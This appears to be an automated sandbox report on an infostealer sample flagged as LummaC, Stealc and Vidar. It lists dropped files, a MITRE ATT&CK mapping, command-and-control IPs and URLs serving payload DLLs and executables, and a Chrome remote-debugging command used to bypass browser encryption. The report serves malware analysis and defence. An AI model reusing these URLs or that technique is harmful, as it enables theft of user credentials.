                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                    Source: Yara matchFile source: 00000017.00000003.2614055476.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2597683395.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2614392992.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2613954644.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2587344921.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2618308087.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2614436981.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2618538724.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2586452016.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2569764013.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2587880421.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: c61fcc859d.exe PID: 7024, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Attempt to bypass Chrome Application-Bound Encryption
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: c61fcc859d.exe PID: 7024, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Stealc
                    Source: Yara matchFile source: 0000001F.00000002.2848404906.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2794500824.0000000005E01000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000003.2560756290.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1685179886.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1958673273.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.2847395793.0000000000621000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000003.2793400829.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1958471071.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2622515140.0000000000621000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2737641634.0000000008220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2626496741.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: c61fcc859d.exe PID: 7024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 309de20225.exe PID: 6128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 309de20225.exe PID: 3604, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: c61fcc859d.exe PID: 7024, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7C0C40 sqlite3_bind_zeroblob,0_2_6C7C0C40
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7C0D60 sqlite3_bind_parameter_name,0_2_6C7C0D60
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E8EA0 sqlite3_clear_bindings,0_2_6C6E8EA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,0_2_6C7C0B40
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E6410 bind,WSAGetLastError,0_2_6C6E6410
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E6070 PR_Listen,0_2_6C6E6070
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6EC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,0_2_6C6EC050
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6EC030 sqlite3_bind_parameter_count,0_2_6C6EC030
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E60B0 listen,WSAGetLastError,0_2_6C6E60B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6722D0 sqlite3_bind_blob,0_2_6C6722D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E63C0 PR_Bind,0_2_6C6E63C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E9400 sqlite3_bind_int64,0_2_6C6E9400
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E94F0 sqlite3_bind_text16,0_2_6C6E94F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E94C0 sqlite3_bind_text,0_2_6C6E94C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E9480 sqlite3_bind_null,0_2_6C6E9480

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		41
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    Scheduled Task/Job                    		2
                    Bypass User Account Control                    		11
                    Deobfuscate/Decode Files or Information                    		LSASS Memory12
                    File and Directory Discovery                    		Remote Desktop Protocol41
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		221
                    Registry Run Keys / Startup Folder                    		112
                    Process Injection                    		3
                    Obfuscated Files or Information                    		Security Account Manager258
                    System Information Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Scheduled Task/Job                    		Login Hook1
                    Scheduled Task/Job                    		12
                    Software Packing                    		NTDS871
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts2
                    PowerShell                    		Network Logon Script221
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		LSA Secrets2
                    Process Discovery                    		SSHKeylogging3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Bypass User Account Control                    		Cached Domain Credentials361
                    Virtualization/Sandbox Evasion                    		VNCGUI Input Capture114
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job361
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553725 Sample: file.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 80 thinkyyokej.sbs 2->80 82 tamedgeesy.sbs 2->82 84 17 other IPs or domains 2->84 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Antivirus detection for URL or domain 2->118 120 19 other signatures 2->120 9 skotes.exe 3 28 2->9         started        14 file.exe 36 2->14         started        16 c61fcc859d.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 94 185.215.113.43, 49829, 80 WHOLESALECONNECTIONSNL Portugal 9->94 96 87.120.125.254 UNACS-AS-BG8000BurgasBG Bulgaria 9->96 98 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 9->98 64 C:\Users\user\AppData\...\c2bb02869b.exe, PE32 9->64 dropped 66 C:\Users\user\AppData\...\309de20225.exe, PE32 9->66 dropped 68 C:\Users\user\AppData\...\c61fcc859d.exe, PE32 9->68 dropped 76 6 other malicious files 9->76 dropped 166 Creates multiple autostart registry keys 9->166 168 Hides threads from debuggers 9->168 170 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->170 20 c61fcc859d.exe 9->20         started        24 c2bb02869b.exe 9->24         started        26 309de20225.exe 9->26         started        34 3 other processes 9->34 100 185.215.113.206, 49730, 49753, 80 WHOLESALECONNECTIONSNL Portugal 14->100 102 185.215.113.16, 49762, 80 WHOLESALECONNECTIONSNL Portugal 14->102 104 127.0.0.1 unknown unknown 14->104 70 C:\Users\user\DocumentsDGHCBAAEHC.exe, PE32 14->70 dropped 72 C:\Users\user\AppData\...\softokn3[1].dll, PE32 14->72 dropped 74 C:\Users\user\AppData\Local\...\random[1].exe, PE32 14->74 dropped 78 11 other files (7 malicious) 14->78 dropped 172 Detected unpacking (changes PE section rights) 14->172 174 Attempt to bypass Chrome Application-Bound Encryption 14->174 176 Drops PE files to the document folder of the user 14->176 180 9 other signatures 14->180 28 cmd.exe 1 14->28         started        30 chrome.exe 14->30         started        178 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->178 32 powershell.exe 18->32         started        file6 signatures7 process8 dnsIp9 86 marshal-zhukov.com 188.114.96.3 CLOUDFLARENETUS European Union 20->86 122 Antivirus detection for dropped file 20->122 124 Detected unpacking (changes PE section rights) 20->124 126 Query firmware table information (likely to detect VMs) 20->126 144 4 other signatures 20->144 128 Multi AV Scanner detection for dropped file 24->128 130 Tries to detect sandboxes and other dynamic analysis tools (window names) 24->130 132 Machine Learning detection for dropped file 24->132 146 4 other signatures 24->146 134 Tries to evade debugger and weak emulator (self modifying code) 26->134 136 Hides threads from debuggers 26->136 138 Tries to detect sandboxes / dynamic malware analysis system (registry check) 26->138 36 DocumentsDGHCBAAEHC.exe 4 28->36         started        40 conhost.exe 28->40         started        88 192.168.2.4, 443, 49672, 49723 unknown unknown 30->88 90 239.255.255.250 unknown Reserved 30->90 42 chrome.exe 30->42         started        45 conhost.exe 32->45         started        92 87.120.125.16 UNACS-AS-BG8000BurgasBG Bulgaria 34->92 140 Injects a PE file into a foreign processes 34->140 142 LummaC encrypted strings found 34->142 47 powershell.exe 17 34->47         started        49 crypted.exe 34->49         started        51 conhost.exe 34->51         started        53 2 other processes 34->53 signatures10 process11 dnsIp12 60 C:\Users\user\AppData\Local\...\skotes.exe, PE32 36->60 dropped 148 Antivirus detection for dropped file 36->148 150 Detected unpacking (changes PE section rights) 36->150 152 Machine Learning detection for dropped file 36->152 156 6 other signatures 36->156 55 skotes.exe 36->55         started        106 www.google.com 142.250.186.100, 443, 49733, 49734 GOOGLEUS United States 42->106 108 play.google.com 142.250.186.46, 443, 49748, 49754 GOOGLEUS United States 42->108 112 2 other IPs or domains 42->112 62 C:\Users\user\AppData\Roaming\...\tyds.lnk, MS 47->62 dropped 154 Powershell creates an autostart link 47->154 58 conhost.exe 47->58         started        110 steamcommunity.com 23.192.247.89 AKAMAI-ASUS United States 49->110 file13 signatures14 process15 signatures16 158 Antivirus detection for dropped file 55->158 160 Detected unpacking (changes PE section rights) 55->160 162 Machine Learning detection for dropped file 55->162 164 5 other signatures 55->164

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\DocumentsDGHCBAAEHC.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\crypted[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\DocumentsDGHCBAAEHC.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\pidgeon[1].exe9%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe37%ReversingLabsWin32.Infostealer.Tinba
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\crypted[1].exe34%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe39%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe9%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe34%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe39%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe37%ReversingLabsWin32.Infostealer.Tinba

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.215.113.206/c4becf79229cb002.phpx100%Avira URL Cloudmalware
                    https://community.fa0%Avira URL Cloudsafe
                    https://marshal-zhukov.com/00%Avira URL Cloudsafe
                    http://185.215.113.206/68b591d6548ec281/msvcp140.dll-Dz100%Avira URL Cloudmalware
                    http://185.215.113.206/$$100%Avira URL Cloudmalware
                    http://185.215.113.206/c4becf79229cb002.phpo100%Avira URL Cloudmalware
                    https://marshal-zhukov.com/apiW0%Avira URL Cloudsafe
                    http://185.215.113.206/c4becf79229cb002.phpt100%Avira URL Cloudmalware
                    http://185.215.113.206ones0%Avira URL Cloudsafe
                    https://marshal-zhukov.com/api:0%Avira URL Cloudsafe
                    https://marshal-zhukov.com/l0%Avira URL Cloudsafe
                    https://marshal-zhukov.com/X0%Avira URL Cloudsafe
                    http://185.215.113.206/c4becf79229cb002.phpodules;C:100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    		23.192.247.89
                    		truefalse
                      		high
                      plus.l.google.com
                      		172.217.16.206
                      		truefalse
                        		high
                        play.google.com
                        		142.250.186.46
                        		truefalse
                          		high
                          www.google.com
                          		142.250.186.100
                          		truefalse
                            		high
                            marshal-zhukov.com
                            		188.114.96.3
                            		truefalse
                              		high
                              rottieud.sbs
                              		unknown
                              		unknowntrue
                                		unknown
                                tamedgeesy.sbs
                                		unknown
                                		unknowntrue
                                  		unknown
                                  repostebhu.sbs
                                  		unknown
                                  		unknownfalse
                                    		high
                                    thinkyyokej.sbs
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      navygenerayk.store
                                      		unknown
                                      		unknownfalse
                                        		high
                                        brownieyuz.sbs
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          presticitpo.store
                                          		unknown
                                          		unknownfalse
                                            		high
                                            founpiuer.store
                                            		unknown
                                            		unknownfalse
                                              		high
                                              explainvees.sbs
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                scriptyprefej.store
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  terracedjz.cyou
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    relalingj.sbs
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      thumbystriw.store
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        necklacedmny.store
                                                        		unknown
                                                        		unknownfalse
                                                          		high
                                                          apis.google.com
                                                          		unknown
                                                          		unknownfalse
                                                            		high
                                                            ducksringjk.sbs
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              crisiwarny.store
                                                              		unknown
                                                              		unknownfalse
                                                                		high
                                                                fadehairucw.store
                                                                		unknown
                                                                		unknownfalse
                                                                  		high

                                                                  Contacted URLs

                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  http://185.215.113.206/false
                                                                    		high
                                                                    fadehairucw.storefalse
                                                                      		high
                                                                      http://185.215.113.206/68b591d6548ec281/nss3.dllfalse
                                                                        		high
                                                                        founpiuer.storefalse
                                                                          		high
                                                                          185.215.113.206/c4becf79229cb002.phpfalse
                                                                            		high
                                                                            https://steamcommunity.com/profiles/76561199724331900false
                                                                              		high
                                                                              https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0false
                                                                                		high
                                                                                http://185.215.113.206/68b591d6548ec281/vcruntime140.dllfalse
                                                                                  		high
                                                                                  presticitpo.storefalse
                                                                                    		high
                                                                                    http://185.215.113.206/68b591d6548ec281/sqlite3.dllfalse
                                                                                      		high
                                                                                      http://185.215.113.206/68b591d6548ec281/mozglue.dllfalse
                                                                                        		high
                                                                                        http://185.215.113.16/steam/random.exefalse
                                                                                          		high
                                                                                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                                                            		high
                                                                                            navygenerayk.storefalse
                                                                                              		high

                                                                                              URLs from Memory and Binaries

                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                              https://duckduckgo.com/chrome_newtabc61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=g9lbYg_WDvLO&amp;l=ec61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://duckduckgo.com/ac/?q=file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=h6HMV-M6cfAX&acrypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&amp;l=englishc61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.gstatic.cn/recaptcha/c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.indyproject.org/pidgeon.exe, 0000000C.00000000.2414950522.000000000042B000.00000020.00000001.01000000.0000000F.sdmp, pidgeon.exe, 0000000C.00000002.2976135543.000000000331C000.00000004.00001000.00020000.00000000.sdmp, pidgeon.exe, 00000019.00000002.2975405348.00000000030AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://navygenerayk.store:443/apic61fcc859d.exe, 0000001E.00000003.2745036681.0000000001354000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.0000000001354000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://185.215.113.206/ws309de20225.exe, 00000018.00000002.2626496741.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.valvesoftware.com/legal.htmcrypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
